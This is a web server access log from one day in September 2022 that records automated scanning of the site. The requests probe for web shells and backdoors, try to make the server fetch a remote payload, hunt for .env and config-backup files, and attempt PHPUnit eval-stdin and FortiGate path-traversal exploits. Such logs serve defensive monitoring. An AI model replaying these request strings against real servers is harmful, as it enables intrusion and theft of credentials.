64.20.63.126 - - [26/Sep/2022:02:38:08 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 162.221.192.26 - - [26/Sep/2022:03:35:36 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 13.81.25.221 - - [26/Sep/2022:04:20:52 +0200] "GET /.env HTTP/1.1" 301 304 "-" "python-httpx/0.23.0" 13.81.25.221 - - [26/Sep/2022:04:20:52 +0200] "POST / HTTP/1.1" 301 301 "-" "python-httpx/0.23.0" 74.82.47.3 - - [26/Sep/2022:04:38:40 +0200] "GET / HTTP/1.1" 301 383 "-" "-" 74.82.47.3 - - [26/Sep/2022:04:50:40 +0200] "GET /favicon.ico HTTP/1.1" 301 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 OPR/89.0.4447.83" 95.216.167.8 - - [26/Sep/2022:04:51:23 +0200] "GET /style.php HTTP/1.1" 301 303 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:51:33 +0200] "GET /moduless.php HTTP/1.1" 301 305 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:51:40 +0200] "GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 301 330 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:51:49 +0200] "GET /admin.php HTTP/1.1" 301 303 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:51:55 +0200] "GET /index.php?3x=3x HTTP/1.1" 301 309 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:52:05 +0200] "GET /boom.php?x HTTP/1.1" 301 305 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:52:11 +0200] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 301 322 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:52:18 +0200] "GET /wp-content/db_cache.php HTTP/1.1" 301 311 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:52:26 +0200] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 301 331 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:52:42 +0200] "GET /xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 301 346 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:52:49 +0200] "GET /wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 301 347 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:52:54 +0200] "GET /larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 301 345 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:53:06 +0200] "GET /th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 301 347 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:53:13 +0200] "GET /alfindex.php HTTP/1.1" 301 306 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:53:24 +0200] "GET /alfa.php HTTP/1.1" 301 302 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:53:32 +0200] "GET /wp-booking.php HTTP/1.1" 301 308 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:53:49 +0200] "GET /cindex.php HTTP/1.1" 301 304 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:54:00 +0200] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 301 315 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:54:15 +0200] "GET /wp-1ogin_bak.php HTTP/1.1" 301 310 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:54:24 +0200] "GET /wp-includes/fonts/css.php HTTP/1.1" 301 313 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:54:29 +0200] "GET /wp-includes/css/css.php HTTP/1.1" 301 311 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:54:40 +0200] "GET /old-index.php HTTP/1.1" 301 306 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:54:47 +0200] "GET /config.bak.php HTTP/1.1" 301 308 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:54:52 +0200] "GET /wp-admin/config.bak.php HTTP/1.1" 301 314 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:55:13 +0200] "GET /wp-content/config.bak.php HTTP/1.1" 301 314 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:55:23 +0200] "GET /wp-includes/config.bak.php HTTP/1.1" 301 316 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:55:30 +0200] "GET /wp-content/themes/config.bak.php HTTP/1.1" 301 318 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:55:36 +0200] "GET /wp-content/plugins/config.bak.php HTTP/1.1" 301 320 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:55:41 +0200] "POST /wp-includes/css/wp-config.php HTTP/1.1" 301 316 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:55:55 +0200] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 301 316 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:55:59 +0200] "GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1" 301 323 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:56:05 +0200] "GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1" 301 326 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:56:12 +0200] "GET /haders.php HTTP/1.1" 301 302 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:56:21 +0200] "GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1" 301 341 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:56:27 +0200] "GET /legion.php HTTP/1.1" 301 304 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 74.82.47.55 - - [26/Sep/2022:04:56:30 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:56:43 +0200] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 301 323 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:56:50 +0200] "GET /wp-includes/lfx.php HTTP/1.1" 301 311 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:56:59 +0200] "GET /wp-includes/small.php HTTP/1.1" 301 311 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:57:08 +0200] "GET /up.php HTTP/1.1" 301 301 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:57:25 +0200] "GET /upload.php HTTP/1.1" 301 304 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:57:31 +0200] "GET /config.php HTTP/1.1" 301 305 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:57:40 +0200] "GET /test.php?Ghost=send HTTP/1.1" 301 310 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:57:46 +0200] "GET /wp-content/langar.php HTTP/1.1" 301 311 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:57:52 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 325 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:58:07 +0200] "GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1" 301 345 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 95.216.167.8 - - [26/Sep/2022:04:58:12 +0200] "GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1" 301 334 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 193.235.141.178 - - [26/Sep/2022:05:51:44 +0200] "GET / HTTP/1.1" 301 307 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 192.241.221.71 - - [26/Sep/2022:06:02:50 +0200] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 301 335 "-" "Mozilla/5.0 zgrab/0.x" 95.216.167.8 - - [26/Sep/2022:06:37:42 +0200] "POST /wp-includes/css/wp-config.php HTTP/1.1" 301 315 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 51.222.253.3 - - [26/Sep/2022:07:13:46 +0200] "GET /robots.txt HTTP/1.1" 301 314 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 51.222.253.19 - - [26/Sep/2022:07:13:48 +0200] "GET / HTTP/1.1" 301 307 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 71.6.232.8 - - [26/Sep/2022:07:25:09 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" 152.89.196.23 - - [26/Sep/2022:08:46:14 +0200] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 301 452 "-" "Python-urllib/3.8" 193.106.29.122 - - [26/Sep/2022:08:59:42 +0200] "GET / HTTP/1.0" 301 388 "-" "Mozilla/5.0" 162.62.191.231 - - [26/Sep/2022:09:35:58 +0200] "GET / HTTP/1.1" 400 500 "-" "curl/7.64.1" 209.141.49.169 - - [26/Sep/2022:09:48:17 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 209.141.51.222 - - [26/Sep/2022:09:48:20 +0200] "GET /favicon.ico HTTP/1.1" 301 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 209.141.49.169 - - [26/Sep/2022:09:48:40 +0200] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 205.185.122.184 - - [26/Sep/2022:09:48:44 +0200] "GET /favicon.ico HTTP/1.1" 301 302 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 192.241.221.28 - - [26/Sep/2022:09:51:31 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 zgrab/0.x" 164.92.192.98 - - [26/Sep/2022:10:37:15 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" 213.32.122.82 - - [26/Sep/2022:13:08:08 +0200] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 152.89.196.211 - - [26/Sep/2022:13:23:53 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 164.52.24.190 - - [26/Sep/2022:14:29:54 +0200] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 164.52.24.190 - - [26/Sep/2022:14:30:27 +0200] "GET /favicon.ico HTTP/1.1" 301 394 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 152.89.196.211 - - [26/Sep/2022:15:33:41 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 301 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 152.89.196.211 - - [26/Sep/2022:16:00:08 +0200] "POST /mifs/.;/services/LogService HTTP/1.1" 301 318 "https://86.59.113.102:443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 128.14.134.134 - - [26/Sep/2022:16:14:18 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.72.48.130 - - [26/Sep/2022:17:15:39 +0200] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" 45.72.48.130 - - [26/Sep/2022:17:15:42 +0200] "GET /robots.txt HTTP/1.1" 301 302 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" 45.72.48.130 - - [26/Sep/2022:17:15:43 +0200] "GET /ads.txt HTTP/1.1" 301 300 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:37:59 +0200] "GET /.env HTTP/1.1" 301 298 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:37:59 +0200] "GET /conf/.env HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:00 +0200] "GET /wp-content/.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:00 +0200] "GET /wp-admin/.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:01 +0200] "GET /library/.env HTTP/1.1" 301 303 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:02 +0200] "GET /new/.env HTTP/1.1" 301 300 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:02 +0200] "GET /vendor/.env HTTP/1.1" 301 302 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:03 +0200] "GET /old/.env HTTP/1.1" 301 300 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:03 +0200] "GET /local/.env HTTP/1.1" 301 302 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:04 +0200] "GET /api/.env HTTP/1.1" 301 300 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:05 +0200] "GET /blog/.env HTTP/1.1" 301 302 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:05 +0200] "GET /crm/.env HTTP/1.1" 301 300 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:06 +0200] "GET /admin/.env HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:06 +0200] "GET /laravel/.env HTTP/1.1" 301 303 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:07 +0200] "GET /app/.env HTTP/1.1" 301 300 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:08 +0200] "GET /app/config/.env HTTP/1.1" 301 306 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:08 +0200] "GET /apps/.env HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:09 +0200] "GET /audio/.env HTTP/1.1" 301 302 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:10 +0200] "GET /cgi-bin/.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:10 +0200] "GET /backend/.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:11 +0200] "GET /src/.env HTTP/1.1" 301 300 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:11 +0200] "GET /base/.env HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:12 +0200] "GET /core/.env HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:13 +0200] "GET /vendor/laravel/.env HTTP/1.1" 301 307 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:13 +0200] "GET /storage/.env HTTP/1.1" 301 303 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:14 +0200] "GET /protected/.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:14 +0200] "GET /newsite/.env HTTP/1.1" 301 302 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:15 +0200] "GET /www/.env HTTP/1.1" 301 299 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:16 +0200] "GET /sites/all/libraries/mailchimp/.env HTTP/1.1" 301 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:16 +0200] "GET /database/.env HTTP/1.1" 301 303 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:17 +0200] "GET /public/.env HTTP/1.1" 301 303 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:18 +0200] "GET /harm.at/.env HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 78.110.173.151 - - [26/Sep/2022:17:38:18 +0200] "POST / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 20.171.97.131 - - [26/Sep/2022:18:09:03 +0200] "GET /.env HTTP/1.1" 301 304 "-" "python-httpx/0.23.0" 20.171.97.131 - - [26/Sep/2022:18:09:03 +0200] "POST / HTTP/1.1" 301 301 "-" "python-httpx/0.23.0" 23.251.102.74 - - [26/Sep/2022:18:19:21 +0200] "GET /owa/ HTTP/1.1" 301 304 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 87.236.176.48 - - [26/Sep/2022:20:15:59 +0200] "GET / 